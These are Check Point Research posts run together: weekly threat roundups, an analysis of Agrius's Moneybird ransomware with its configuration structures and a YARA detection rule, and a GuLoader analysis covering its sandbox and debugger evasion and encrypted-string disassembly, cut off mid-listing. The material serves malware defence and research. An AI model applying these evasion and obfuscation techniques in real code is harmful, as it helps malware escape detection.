For the latest discoveries in cyber research for the week of 29th May, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• The Cuba ransomware gang has claimed responsibility for the cyberattack on The Philadelphia Inquirer, the largest newspaper in Philadelphia. The newspaper was hit by ransomware on May 14^th, leading its IT team to shut down computer systems to prevent further damage. The attack also temporary disrupted the distribution of the print newspaper.

Check Point Threat Emulation provides protection against this threat (Ransomware.Wins.Cuba.ta.*)

• The Indian manufacturing plant responsible for producing Suzuki motorcycles has been shut down due to a cyberattack, which has been impacting the business since May 10. It has been reported that the production of bikes and scooters has been temporarily suspended.
• The BlackByte ransomware gang has launched an attack against the City of Augusta, a major city in Georgia, U.S. The attackers are demanding a ransom of $400,000 to delete the stolen information. BlackByte has already leaked a 10GB sample of what they claim to be sensitive data from the victim.

Check Point Threat Emulation provides protection against this threat (Ransomware.Wins.Blackbyte.ta.*)

• The North Korean APT group known as Kimsuky has launched a campaign targeting North Korea-focused information services, human rights activists, and organizations providing support to DPRK defectors. Kimsuky has made extensive use of less common TLDs during their malicious domain registration process, like abusing .space, .asia, .click, and .online TLD’s.

Check Point Anti-Bot Blade provides protection against this threat (Backdoor.WIN32.Kimsuky.A)

• Satellite broadcast giant DISH confirmed that 296,851 people were affected by the February ransomware attack, impacting their internal communications, call centers, and websites. Black Basta ransomware group is suspected to be behind this attack.

Check Point Threat Emulation provides protection against this threat (Ransomware.Win.BlackBasta; Ransomware_Linux_Basta)

• Researchers have reported on DarkCloud info-stealer, which is currently being distributed via spam emails. DarkCloud is designed to steal account credentials stored on infected systems. Recent campaigns have also observed the installation of ClipBanker malware alongside DarkCloud by threat actors.

Check Point Threat Emulation provides protection against these threats (Trojan.Wins.Darkcloud.ta.A; Trojan.Win.Clipbanker.N; Trojan.Wins.Clipbanker.ta.*)

VULNERABILITIES AND PATCHES

• Barracuda Networks has disclosed that an RCE vulnerability (CVE-2023-2868) had impacted its Email Security Gateway (ESG) product. According to the company, the vulnerability allowed attackers unauthorized access to the gateways, until a patch was pushed by the company.
• D-Link, a Taiwanese networking solutions vendor, has fixed two critical vulnerabilities in its D-View 8 software. D-View 8 is a network management suite used for monitoring performance, device configurations, and more. The vulnerabilities (CVE-2023-32165 and CVE-2023-32169) could have allowed remote attackers to bypass authentication and execute arbitrary code.
• Zyxel has released a security advisory for several vulnerabilities (CVE-2023-33009 and CVE-2023-33010) capable of allowing unauthenticated RCE in their line of Firewall and VPN products. These buffer overflow vulnerabilities are also capable of inducing denial of service conditions.
• CISA has released four Industrial Control Systems (ICS) advisories on May 23, 2023. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

THREAT INTELLIGENCE REPORT

• Check Point Research has disclosed a new ransomware family dubbed Moneybird that has been deployed by the Iranian APT group – Agrius. The group which was recently linked to Iranian Ministry of Intelligence and Security (MOIS) used this ransomware to target Israeli organizations.

Check Point Threat Emulation provides protection against this threat (Ransomware.Wins.MoneyBird.*)

• Check Point Research has published a report on GuLoader – a prominent shellcode-based downloader that has been used in a large number of attacks to deliver a wide range of the “most wanted” malware. GuLoader’s payload is fully encrypted, what allows threat actors to store payloads using well-known public cloud services, and bypass antivirus protections.

Check Point Threat Emulation provides protection against this threat (Dropper.Win.CloudEyE.*)

• Check Point Research elaborates on the latest Chinese state sponsored attacks and their use of network devices. This follows a joint Cybersecurity Advisory that United States and international cybersecurity authorities issued  on Chinese state-sponsored cyber actor, also known as Volt Typhoon. This actor have compromised “critical” cyber infrastructure in a variety of industries, including governmental and communications organizations.
• Researchers have discovered a new ransomware family dubbed Obsidian ORB that targets Windows platforms. The group demands payment in the form of gift cards from popular online stores rather than traditional cryptocurrency ransom.

The post 29th May – Threat Intelligence Report appeared first on Check Point Research.

Key Points

• Agrius continues to operate against Israeli targets, masking destructive influence operations as ransomware attacks.
• In recent attacks the group deployed Moneybird, a previously unseen ransomware written in C++.
• Despite presenting themselves as a new group with the name– Moneybird, this is yet another Agrius alias.
• The data was eventually leaked through one of Agrius previous aliases.
• As demonstrated in the Moneybird attacks, Agrius’s techniques, tactics and procedures (TTP) remain largely unchanged.

Introduction

While responding to a ransomware attack against an Israeli organization, the Check Point Incident Response Team (CPIRT) and CPR identified a new strain of ransomware called Moneybird. Although the payload itself was unique, the TTPs demonstrated in the attack had clear overlaps with a threat actor known as Agrius. The data was eventually leaked by an entity with one of the group’s known aliases.

First introduced in 2021, Agrius is an Iran-aligned threat actor that operates mostly in the Middle-East. The actor has been tied to several ransomware and wiper attacks, with a major focus on Israeli institutions. The group’s affiliation within Iran is not clear, although recent reports have tied it to the Iranian Ministry of Intelligence and Security (MOIS).

The newly discovered ransomware used by the group, Moneybird, was used to target organizations in Israel. This correlates with Agrius past activities against other organizations in Israel, most notably Shirbit and Bar Ilan University. The group has used a wide set of aliases for its extortion entities. BlackShadow, the name used by the group to extort Shirbit, was the first known alias Agrius has taken and is still commonly associated with it.

Agrius ransomware operations have been mostly tied to a custom ransomware called Apostle, which was originally a wiper. The use of a new ransomware, written in C++, is noteworthy, as it demonstrates the group’s expanding capabilities and ongoing effort in developing new tools.

Activity Analysis

Agrius’s actions leading to the deployment of Moneybird correlates to previous reports of the group’s activity.

Agrius’ first foothold was established by exploiting vulnerabilities within public-facing web servers, leading to the deployment of unique variants of ASPXSpy. The exploitation and the post-exploitation activities were carried out using public VPN services nodes, most prominently ProtonVPN nodes in Israel.

The ASPXSpy webshells were deployed in a unique fashion, hidden inside “Certificate” text files. This method is tied to past observed group activities. To use the webshell, the actor decoded the content of the file into a separate ASPX file.

Following the deployment of webshells, the threat actor was observed utilizing several publicly available tools to perform recon, move laterally, harvest credentials, and exfiltrate data. The tools include:

• SoftPerfect Network Scanner – Scan internal networks.
• Plink – RDP tunnel traffic from a VPS owned by the actor.
• ProcDump – Dump LSASS and harvest credentials. ****
• FileZilla – Exfiltrate compressed files.

Interestingly enough, the actor performed most of the activity while manually connected through RDP. To download some of the payloads, the actor opened a browser and connected to the legitimate file sharing services ufile[.]io and easyupload[.]io that hosted the malicious files.

One of the files the threat actor downloaded was the ransomware executable stored within an archive – Moneybird.

Moneybird Ransomware – ****Technical Analysis****

Moneybird is written in C++ and contains an indicative PDB path: C:\Users\user\Desktop\moneybird\x64\Release\moneybird.pdb. The name embedded within the ransomware sample reveals that the encryptor shares the same name that appears in the attack ransom note for the attack: Moneybird.

Many recent ransomware strains typically support command-line parameters that enable attackers to customize malware functionality on top of the malware’s embedded configuration. This specific threat lacks any command-line parsing capability. Instead, it includes a configuration blob embedded within the tool itself, which makes it less suitable for mass campaigns with different environments.

This configuration contains several key elements that are used when the malware is executed. The sample ignores the first DWORD. The second one contains an integer value representing the number of milliseconds the malware waits before executing.

After these initial values, the configuration includes four additional DWORDs.

• The first DWORD in this sequence acts as a flag, which determines whether the ransomware should take into account its embedded list of 194 extensions to target. The extension list includes the most common document formats, database formats, certificates, etc. A value of “1” means the list is consulted, while a value of “2” causes the ransomware to ignore the list and encrypt all files in the targeted paths indiscriminately, except for those kept in a narrow list of file extensions that are never encrypted: exe, dll, sys, msi, lnk.
• The second DWORD in the sequence contains the maximum number of threads that are created to encrypt every targeted file.
• The third DWORD contains the number of threads assigned to the routine that is executed before the encryption. This ensures that the targeted files are not marked as “SYSTEM” elements to be avoided.

It is noteworthy to mention that the drawback of this approach is its lack of effectiveness in comparison to other ransomware strains that utilize the WIN API GetSystemInfo or directly access PEB→dwNumberOfProcessors. By using these methods, they can dynamically determine the number of CPUs per system and assign the encryption logic an appropriate number of threads based on this number.

• The final DWORD in the sequence specifies the size of an ASCII string that comes next. This string contains the base64-encoded public key that is used to encrypt the symmetric encryption keys that are generated per file.

Immediately following the public key, the configuration contains an integer value that determines the number of null-terminated strings that come next. These strings indicate the paths on the target machine that the sample encrypts, which is somewhat unusual as these malware usually try to cipher as much data as possible. In this particular case, there is only one path F:\User Shares, resulting in all other system paths being omitted. The remaining space in the configuration (up to 1024 bytes, including the previous elements) is reserved for possible additional system path entries. If no more entries are added, the remaining space is filled with the character “A”, as in this sample.

If there is no path entry in the configuration, the malware behaves in a more generic fashion and uses the WIN API function GetLogicalDrives to obtain a list of currently available disk drives on the targeted machine and then starts to process it.

The configuration structure in decompiled C form:

struct mb_config
{
        DWORD start_sleep_delay;
        DWORD ignore_extension_flag;
        DWORD num_of_ciphering_threads;
        DWORD num_of_check_threads;
        DWORD sizeof_b64_public_key;
        char b64_public_key[124];
        DWORD num_off_paths;
        char first_path[15];
        char room_for_paths[860];
};

The encryption logic of this ransomware sample depends on several embedded libraries, including “libgcrypt”, which is easily identifiable in the sample strings.

...
C:\Users\user\Desktop\moneybird\Shiftlibgcrypt\cipher\mac.c
C:\Users\user\Desktop\moneybird\Shiftlibgcrypt\mpi\mpi-pow.c
C:\Users\user\Desktop\moneybird\Shiftlibgcrypt\src\fips.c
C:\Users\user\Desktop\moneybird\Shiftlibgcrypt\cipher\primegen.c
C:\Users\user\Desktop\moneybird\Shiftlibgcrypt\mpi\mpicoder.c
C:\Users\user\Desktop\moneybird\Shiftlibgcrypt\cipher\dsa.c
C:\Users\user\Desktop\moneybird\Shiftlibgcrypt\random\random-drbg.c
C:\Users\user\Desktop\moneybird\Shiftlibgcrypt\cipher\elgamal.c
C:\Users\user\Desktop\moneybird\Shiftlibgcrypt\cipher\blake2.c
C:\Users\user\Desktop\moneybird\Shiftlibgcrypt\cipher\keccak.c
...

Looking at the folder name inside the strings, it is likely that the library was compiled from this GitHub repository. Basically, the repository contains an “unofficial” version of “libgcrypt”, which the authors tried to make easier to include in Visual Studio projects.The malware also uses “libpgp-error”, a library that libgcrypt requires as a dependency.

Finally, the malware is also linked with a copy of the “cryptopp” library. This library can be easily identified by strings that directly reference its name, as well as a distinctive test string that is used as text to encrypt in many versions of this library.

The ransomware uses the functions provided by the libraries to perform encryption using AES-256 with GCM mode. The definition of both constants can be obtained from the source code of the library at the following link.

As you can see in the image above, the IV 012345678901255 for AES-256-GCM is hardcoded inside the ciphering function while the key is passed as the last parameter to the function.

The code responsible for the generation of the key:

This code is executed for each file, so each one is assigned a unique encryption key. To generate a key, the sample concatenates a GUID (marked in red) obtained through the WIN API CoCreateGuid with a random number (marked in green) generated using the rand() function. The seed for the rand() function is based on the system time. Then, 8 bytes of the file content (marked in blue) to be encrypted is concatenated. Finally, the full path for the target file (marked in purple) is added, but only 4 bytes of it are used as the last part of the key as it completes the 32-byte chunk.

struct aes_key
{
        char guid[16];
      int rand_val;
      char file_content[8];
      char file_path_start[4];
};

The utilization of a GUID obtained through the WIN API CoCreateGuid makes it very difficult to obtain the encryption key, as it is generated by making an RPC call to “UuidCreate”, which gets its randomness by calling ProcessPrng from bcryptPrimitives.dll, as this function is cryptographically secured to generate random bytes.

After the full path of the target file that overflows the 32-byte aes_key, the malware adds the length of the path, creating a kind of secondary structure:

struct meta_info
{
        char guid[16];
      int rand_val;
      char file_content[8];
      char file_path[file_path_length];
        int file_path_length;
};

This structure is encrypted by the hybrid encryption system “Elliptic Curve Integrated Encryption Scheme” – CryptoPP ECIES – using the embedded public key shown previously inside the sample’s configuration. After the file encryption, this encrypted meta_info structure is appended at the end of the final file, resulting in the struct below:

struct encrypted_file
{
      char enc_file_content[file_content_length];
      char enc_meta_info[enc_meta_info_length];
      int enc_meta_info_length;
};

Conclusion

Our analysis of incidents involving Moneybird reveals the ongoing effort of Agrius to utilize ransomware to make an impact. Although Agrius has used different aliases in the past, public reports up to now have tied most of their destructive activities to variants of Apostle, which acted as wipers or ransomware. The use of a new ransomware demonstrates the actor’s additional efforts to enhance capabilities, as well as hardening attribution and detection efforts.

Despite these new “covers”, the group continues to follow its usual behavior and utilize similar tools and techniques as before. Moneybird, like many other ransomware, is a grim reminder of the importance of good network hygiene, as significant parts of the activity could have been prevented early on.

Moneybird itself, although not particularly complex, has a number of intriguing features that appear to have been designed for specific targets. Some of these specialty features make the malware less practical for use in multiple unrelated campaigns. This emphasizes the malware’s targeted nature, including the use of “targeted paths” which, in the specific sample we analyzed, makes the ransomware ignore most of the files on the target machine.

Check Point customers remain protected from the threats described in this research.

Check Point Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems, and has developed and deployed a signature named “Ransomware.Wins.MoneyBird” to detect and protect our customers against Moneybird.

YARA

rule ransomware_moneybird {
  meta: 
    author = "Marc Salinas @ Check Point Research" 
    description = "Detects a ransomware sample named Moneybird based on its pdb string."
    malware_family = "MoneyBird" 
    date = "11/05/2023"  
    sample = "aa19839b1b6a846a847c5f4f2a2e8e634caeebeeff7af59865aecca1d7d9f43c" 

  strings:
    $ran1 = "WE ARE MONEYBIRD!"
    $ran2 = "All of your data encrypted!"
    $ran3 = "ok.ru/profile"

    $ext1 = "Shiftlibgcrypt"
    $ext2 = "come to the aide of their"
    $ext3 = "stopmarker" wide

    $code1 = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 89 4C 24 08 56 57 48 83 EC 78 48 8B 05 68 FE 1A 00 48 33 C4 48 89 44 24 60 48 8D 44 24 50 48 8D 0D DC 68 15 00 48 8B F8 48 8B F1 B9 10 00 00 00 F3 A4 45 33 C9 41 B8 09 00 00 00 BA 09 00 00 00 48 8D 4C 24 48 ?? ?? ?? ?? ?? 41 B8 20 00 00 00 48 8B 94 24 A0 00 00 00 48 8B 4C 24 48 ?? ?? ?? ?? ?? 48 8D 44 24 50 48 89 44 24 40 48 C7 44 24 30 FF FF FF FF}
    $code2 = {48 FF 44 24 30 48 8B 44 24 40 48 8B 4C 24 30 80 3C 08 00}
    $code3 = {48 8B 44 24 30 4C 8B C0 48 8D 54 24 50 48 8B 4C 24 48 ?? ?? ?? ?? ?? 8B 84 24 90 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 44 8B C0 48 8B 94 24 98 00 00 00 48 8B 4C 24 48 ?? ?? ?? ?? ?? 89 44 24 38 48 8B 4C 24 48 ?? ?? ?? ?? ?? 48 8B 4C 24 60 48 33 CC ?? ?? ?? ?? ?? 48 83 C4 78 5F 5E C3}

  condition:
    uint16(0) == 0x5A4D and (2 of ($ran*) or all of ($code*) or all of ($ext*))

The post Agrius Deploys Moneybird in Targeted Attacks Against Israeli Organizations appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 22nd May, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• PharMerica, a provider of pharmacy services across the U.S., disclosed a data breach impacting approximately 5.8 million of its patients. Money Message ransomware gang claimed the attack during April, and threatened to leak 4.7 TB of stolen data.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.RMShadowCopy)

• A new ransomware strain called MalasLocker is actively targeting Zimbra servers, encrypting files, stealing emails and demanding a ransom payment. Instead of demanding a traditional ransom, the MalasLocker group requests a charity donation as a form of payment.
• FIN7, the financially motivated group that is also known as Sangria Tempest, has recently reemerged with ties to attacks that aimed to deploy Clop ransomware on victims’ networks. This marks the group’s first ransomware campaign since late 2021. The group is primarily targeting organizations in the retail, hospitality, and healthcare sectors.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Ransomware.Win.Clop; Ransomware.Wins.Clop; Ransomware_Linux_Clop)

• A new ransomware group known as RA Group has breached several organizations in the U.S. and South Korea with double extortion attacks. The ransomware operation may be using an encryptor based on leaked source code for the Babuk ransomware.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.win.rank, Ransomware.Win.TouchTrapFiles.A; TS_Ransomware.Win.Babuk.A; Ransomware.Win.Babuk.A)

• ScanSource, a major U.S. based technology distributor, experienced multi-day outages due to a ransomware attack. The company is working to restore its systems and has engaged with external experts to investigate the incident.
• Luxottica, a leading eyewear company, has confirmed a data breach that occurred in 2021 after the personal information of approximately 70 million individuals was leaked for free on hacking forums.
• Threat actors have launched new phishing campaigns that use cloned websites posing as legitimate CapCut popular video-editing sites to distribute info-stealing malware.

VULNERABILITIES AND PATCHES

• Threat actors are actively targeting vulnerable websites using the WordPress Elementor plugin following the release of a proof-of-concept exploit. The plugin, which has millions of installations, has a critical vulnerability (CVE-2023-32243) that allows attackers to execute arbitrary code and gain control over affected websites.
• Cisco has issued a warning about critical vulnerabilities affecting its switches. The vulnerabilities (CVE-2023-20159, CVE-2023-20160, CVE-2023-20161, and CVE-2023-20189) reportedly have public exploit code available.
• Apple has released patches addressing three exploited zero-day vulnerabilities (CVE-2023-28204, CVE-2023-32373 and CVE-2023-32409) in the WebKit engine used by Safari and other Apple products.
• CISA has issued a warning about an Address Space Layout Randomization (ASLR) bypass vulnerability (CVE-2023-21492) affecting Samsung mobile devices. The vulnerability is being exploited ITW.

THREAT INTELLIGENCE REPORT

• Check Point Research had discovered a custom firmware implant tailored for TP-Link routers that has been linked to a Chinese state-sponsored APT group tracked as Camaro Dragon, which shares similarities with Mustang Panda. The implant was used in targeted attacks aimed at European foreign affairs entities, and it features several malicious components. This includes a custom backdoor named “Horse Shell”, which enables the attackers to maintain persistent access, build anonymous infrastructure and enable lateral movement into compromised networks.

Check Point Quantum IoT Protect and Threat Emulation provide protection against this threat (APT.Wins.HorseShell)

• Check Point identified malicious extensions for Visual Studio Code (VSCode) with over 45,000 downloads that steal personally identifiable information (PII) and enable backdoor access to users’ systems.  Among those extension are “prettiest java”, “darcula dark” and “python-vscode”.
• The FBI, CISA, and ACSC warn that the BianLian ransomware group has shifted its tactics to extortion-only attacks. Instead of encrypting files and demanding a ransom, the group now focuses on stealing sensitive data and threatening to release it unless a payment is made.

Check Point Threat Emulation provides protection against this threat (Ransomware.Win.GenRansom.glsf.A)

• A cybercrime gang tracked as “Lemon Group” has been detected infecting almost 9 million of Android devices with a malware called Guerilla. The malware is capable of stealing sensitive information, performing ad fraud, and installing additional malicious apps.

The post 22nd May – Threat Intelligence Report appeared first on Check Point Research.

Key takeaways

• GuLoader is a prominent shellcode-based downloader that has been used in a large number of attacks to deliver a wide range of the “most wanted” malware.
• GuLoader has been active for more than three years and is still undergoing further development. The latest version integrates new anti-analysis techniques, which results in it being significantly challenging to analyze. New GuLoader samples receive zero detections on VirusTotal, ensuring its malicious payloads also remain undetected.
• GuLoader’s payload is fully encrypted, including PE headers. This allows threat actors to store payloads using well-known public cloud services, bypass antivirus protections, and keep payloads available for download for a long period of time.
• Earlier versions of GuLoader were implemented as VB6 applications containing encrypted shellcode. Currently, the most common versions are based on the VBScript and the NSIS installer. The VBScript variant stores the shellcode on a remote server.

Introduction

Antivirus products are constantly evolving to become more sophisticated and better equipped to handle complex threats. As a result, malware developers strive to create new threats that can bypass the defenses of antivirus products. “Packing” and “crypting” services are specifically designed to resist analysis. GuLoader is one of the most prominent services cybercriminals use to evade antivirus detection.

Figure 1 – The number of attacks using GuLoader in the past 6 months.

In addition to code encryption, GuLoader utilizes many other techniques including anti-debugging and sandbox evasion techniques. A distinguishing feature of GuLoader is that the encrypted payload is uploaded to a remote server. The would-be attacker gets a highly protected shellcode-based loader that downloads the payload from a remote server, and decrypts and runs it in memory without dropping the decrypted data to the hard drive.

Despite Google’s efforts to block GuLoader’s encrypted malicious payloads, GuLoader still downloads payloads from Google Drive in most cases. The following chart shows the statistics of the different hosting services used by GuLoader over the past month.

Figure 2 – Different hosting services used by GuLoader between March – April 2023.

We see evidence that GuLoader is currently being used to distribute the following malware:

• Formbook
• XLoader
• Remcos
• 404Keylogger
• Lokibot
• AgentTesla
• NanoCore
• NetWire

Early GuLoader samples managed to avoid detection by antivirus products, but later different security solutions became capable of detecting this malware.  However, in parallel with the ongoing development of antivirus software by cybersecurity vendors, the GuLoader developers also continued improving their product. In the absence of previous research findings and understanding of the anti-analysis mechanisms employed in GuLoader, analyzing the code of the new version would be exceedingly challenging.  You will discover the reasons for this below in our report.

Technical details

The earlier versions of GuLoader were implemented as VB6 applications containing encrypted shellcode. The shellcode performed the main functions of loading the encrypted payload, decrypting it and launching it from memory.

Currently, the most common versions are based on the VBScript and the NSIS installer (Nullsoft Scriptable Install System).

VBScript variant

In the earlier version described at the end of 2022, the shellcode was stored inside the VBScript.

A distinctive feature of the new version is that the encrypted shellcode is hosted on a cloud service (usually Google Drive). VBScript itself contains only a small obfuscated PowerShell script and a lot of junk code. This allows GuLoader samples to maintain a very low detection rate.

Here is an example of an infection chain that uses the VBS variant of GuLoader:

Figure 3 – Infection chain that uses VBS variant of GuLoader.

Let’s consider a sample with SHA256 5fcfdf0e241a0347f9ff9caa897649e7fe8f25757b39c61afddbe288202696d5. At the time of uploading to VirusTotal (VT) on March 3, 2023, it had 0 detections:

Figure 4 – Zero detections of GuLoader sample in VT.

Two days after it was uploaded, only 17 out of 59 vendors flagged this sample as malicious.

We should note that at the time of writing this article, it has been 3 weeks since the specified sample was uploaded to VT, and the URLs for both downloading the GuLoader shellcode and for downloading the malicious payload (Remcos) were still active:

Let’s take a look inside the GuLoader VBScript. It contains a lot of pseudo-random comments and some useless commands. After cleaning it up a bit, the code we got looks like this:

Figure 5 – Cleaned GuLoader VBScirpt.

The purpose of this code is to call the PowerShell interpreter and pass it the code of the script collected in the “pa0” variable as a parameter.

If we look at the contents of the “pa0” variable after adding the omissions and hyphens, we get the following script:

Figure 6 – GuLoader obfuscated PowerShell script.

We see that this new script contains the function “Gothites9“, which implements cutting the passed string starting from the second character with a step of 3. Therefore, the result for the command “$Tjene0 = Gothites9 ‘ OIUlEDiXSa ‘;” is “IEX ”.

The string $Parrotb is converted in the same way. Starting from position 2, taking every third character from this string gives us a string that is another PowerShell script:

Figure 7 – GuLoader PowerShell script after removing the first layer of obfuscation.

This script is called either by using the IEX command (if the OS is 32-bit) or passed as a parameter to the PowerShell interpreter called from the SysWOW64 folder (if the OS is 64-bit). This is because the GuLoader shellcode must run in a 32-bit process.

We can already see that the script code contains the URL pointing to Google Drive.

However, the resulting script is still heavily obfuscated. The script starts with a function that is used to decode strings:

Figure 8 – Encoded strings in the GuLoader PowerShell script.

It is interesting that all lines in the nested script are stored in encoded form, except for the line with the URL.

After deobfuscating the script, we got the following code:

Figure 9 – Deobfuscated GuLoader PowerShell script.

Now we can see that the script allocates 2 memory areas, downloads the data from the link to Google Drive, and saves it to a temporary file “%APPDATA%\Umig.For”. Next, the contents of the downloaded file are decoded using BASE64. The first 654 bytes of the decoded data are placed in the first memory area (“$Gamme2483” in the example), and the rest in the second (“$Nulstille” in the example). The first 654 bytes contain an obfuscated shellcode which is intended to decrypt the second copied area containing the main part of the shellcode in encrypted form.

Control is transferred to the decryptor by using the CallWindowsProc callback function, which also receives the address of the encrypted shellcode and the address of the NtProtectVirtualMemory function as arguments.

NSIS-installer based variant

Unlike the VBS variant, samples based on the NSIS contain the GuLoader shellcode, albeit in encrypted form. This allows you to run the sample in a sandbox and see the behavior of GuLoader even if the sandbox is not connected to the Internet. Static analysis of NSIS script and encrypted shellcode is also possible.

Such samples now receive a consistent number of detections by antivirus products at the time of the first upload to VirusTotal.

Figure 10 – Detection rate of NSIS-installer-based GuLoader variant.

We will not describe this variant in detail, as it was already analyzed in the article GuLoader: The NSIS Vantage Point.

GuLoader shellcode

The same version of the shellcode is used in both the NSIS and VBS variants. As in previous GuLoader versions, the shellcode implements a large number of anti-analysis techniques:

Sandbox evasion techniques including:

• Scanning memory for VM-related strings.
• Checking if the hypervisor bit is enabled, using CPUID instruction (https://evasions.checkpoint.com/techniques/cpu.html#check-if-being-run-in-Hypervisor-via-cpuid).
• Measuring time, using RDTSC in combination with CPUID (https://evasions.checkpoint.com/techniques/timing.html#rdtsc).
• Searching for QEMU related files: C:\Program Files\Qemu-ga\qemu-ga.exe and C:\Program Files\qga\qga.exe.
• Counting the number of Windows, using the EnumWindows API function (https://evasions.checkpoint.com/techniques/ui-artifacts.html#check-number-of-top-level-windows).
• Checking if there are any VM-related drivers present, using the EnumDeviceDrivers API function.
• Enumerating installed software, using the MsiEnumProductsA and MsiGetProductInfoA.

Anti-debugging techniques:

• Hooking the functions DbgBreakPoint (https://anti-debug.checkpoint.com/techniques/process-memory.html#patch_ntdll_dbgbreakpoint) and DbgUiRemoveBreakIn (https://anti-debug.checkpoint.com/techniques/process-memory.html#patch_ntdll_dbguiremotebreakin) to prevent the debugger from attaching.
• Hiding the main thread from the debugger calling the NtSetInformationThread function with the ThreadHideFromDebugger (https://anti-debug.checkpoint.com/techniques/interactive.html#ntsetinformationthread) ThreadInformationClass value.

Knowing the techniques used by the GuLoader shellcode, it is quite easy to bypass them by using a debugger in the process of dynamic analysis. However, in the new version, we encountered a technique that makes both debugging and static analysis extremely difficult.

A new anti-analysis technique

Starting from the end of 2022, the GuLoader shellcode uses a new anti-analysis technique, which consists of breaking the normal flow of code execution by deliberately throwing a large number of exceptions and handling them in a vector exception handler that transfers control to a dynamically calculated address.

To throw exceptions, the code uses the int3 instruction. It was possible to implement a script to automatically replace int3 instructions with jump instructions to the correct address:

Figure 11 – Replacement of the int3 instruction with the jmp instruction.

This technique was first described in the article Malware Analysis: GuLoader Dissection Reveals New Anti-Analysis Techniques and Code Injection Redundancy. However, in the new version this technique has been improved. The shellcode started using three different patterns to throw exceptions and break the normal flow of code execution.

• Accessing an invalid memory address to cause access violation.

This pattern is quite straightforward. First, as a result of mathematical operations, one of the registers is set to zero value. The shellcode then attempts to write data to the memory addressed by this register:

Figure 12 – Accessing invalid memory address to raise the access violation exception.

This causes the access violation exception (0xC0000005). The exception is handled in GuLoader by the registered VEH which calculates the new address to continue the shellcode execution. The numbers used and the mathematical operations that lead to the calculation of the zero value are always different.

• Setting the Trap Flag to raise the single-step exception.

GuLoader uses the following combination of instructions to set TF in the EFALGS register:

Figure 13 – Setting a Trap Flag to raise the single-step exception.

At first glance, it is unclear what happens in this piece of code. However, if we calculate the valued in the register EDI, we get the value 0x100. The combination of the next few instructions is intended to push the EFLAGS and set the TF (Trap Flag) bit to “1”. The modified value from the stack is then set back to the EFLAGS register.

When the Trap flag is set in the EFLAGS register but no debugger is attached, the processor  generates a single-step exception (0x80000004) after the execution of the next instruction. In GuLoader, the registered VEH is called in this case. However, if the debugger is attached, the GuLoader’s VEH is not called and execution follows the wrong path.

The code chunks in the GuLoader shellcode are always different; various combinations of registers can be used. As in the case of invalid memory address, the numbers used and the mathematical operations that lead to the calculation of the value 0x100 to set TF in the EFLAGS register are always different.

• Using int3 to raise the breakpoint exception.

Using int3 as instruction as an anti-analysis technique was already implemented in the previous version of GuLoader. However, it is still used in various parts of the GuLoader shellcode. When the CPU encounters the int3 instruction in the absence of a debugger, it generates a breakpoint exception (0x80000003) and the registered VEH is called. However, if a debugger is attached, the control is transferred to the debugger’s interrupt handler which typically pauses the program’s execution.

The int3 instruction is usually followed by random bytes that break the normal execution of the shellcode:

Figure 14 – Using int3 to raise the breakpoint exception.

As a result, we cannot determine the correct execution path without analyzing the code of the GuLoader VEH.

Exception handler

To calculate a new jump address in the case of one of the 3 specified exceptions, and direct the program to a new execution path, GuLoader registers a vector exception handler (VEH) using the RtlAddVectoredExceptionHandler function.

To see how the jump address is calculated, let’s look at the VEH code.

Like other parts of the code, VEH code is obfuscated. It contains junk instructions, and important values are calculated dynamically using XOR operations:

Figure 15 – Obfuscated VEH code.

However, after the decompilation in IDA this code looks very simple:

Figure 16 – Decompiled VEH code.

As you can see, VEH actions are slightly different depending on the exception code. In the case of exceptions 0x80000004 (EXCEPTION_SIGNLE_STEP) and 0xC0000005 (EXCEPTION_ACCESS_VIOLATION), it gets the value of the byte at offset 2 from the instruction where the exception occurred and XORs that byte with some constant value (0x8B in the example). In the case of exception 0x80000003 (EXCEPTION_BREAKPOINT), the byte at offset 1 is taken and also XORs with the constant. It should be noted that the specified constant is different in all samples. The resulting value is then added to the EIP value in the exception context. Therefore, when exiting the exception handler, control is transferred to the new address.

In all cases, the exception handler also checks the status of the debug registers:

Figure 17 – Checking debug registers in VEH.

If any hardware breakpoints are set, the exception handler refers to the zero address instead of the ContextRecord address. This eventually causes the application to crash.

In the case of EXCEPTION_BREAKPOINT, the exception handler also looks for software breakpoints in the address space between the old EIP and the calculated new EIP values.

Despite the huge variety of code combinations that can be used to trigger the execution of the exception handler, they all follow 3 patterns, and we can implement a regular expression to find most of them. However, we expect that the GuLoader developers may change the patterns in new versions.

To patch one instruction on which an exception is raised and replace it with a jump to a correct address in x32dbg, you can use the following script (you must replace 0x8B with a constant value from the sample you analyze):

mov $const, 0x8B
cmp 1:[eip], 0xCC
je exception_breakpoint

mov $x, 1:[eip + 2]
xor $x, $const
jmp patch

exception_breakpoint:
mov $x, 1:[eip + 1]
xor $x, $const

patch:
sub $x, 2
1:[eip+1] = $x
1:[eip] = 0xEB

URL decryption

All the strings, including the URL for downloading the final payload, are encrypted and stored in a specific form in the shellcode:

; eax is set to the address of the allocated memory
8B 44 24 04             mov     eax, [esp+target_enc_str_buffer]
; first 4 bytes of the buffer contain the length of the encrypted string
; the bytes are calculated using xor, add, and sub operations:
C7 00 75 9B D5 11       mov     dword ptr [eax], 11D59B75h
81 30 0E 84 7B 49       xor     dword ptr [eax], 497B840Eh
81 28 1C 8B 75 41       sub     dword ptr [eax], 41758B1Ch
81 00 B3 6B C7 E8       add     dword ptr [eax], 0E8C76BB3h ; 12 00 00 00
; ...
; increment eax by 4
05 97 47 CD 01          add     eax, 1CD4797h
2D 93 47 CD 01          sub     eax, 1CD4793h ; eax = eax + 4
; ...
; calculate next 4 bytes of the encrypted string
C7 00 B9 FD D8 E0       mov     dword ptr [eax], 0E0D8FDB9h
81 30 06 79 13 36       xor     dword ptr [eax], 36137906h
81 30 AD 51 65 B7       xor     dword ptr [eax], 0B76551ADh
81 30 81 FA 9D 8C       xor     dword ptr [eax], 8C9DFA81h  ; 12 00 00 00 93 2F 33 ED
; ...

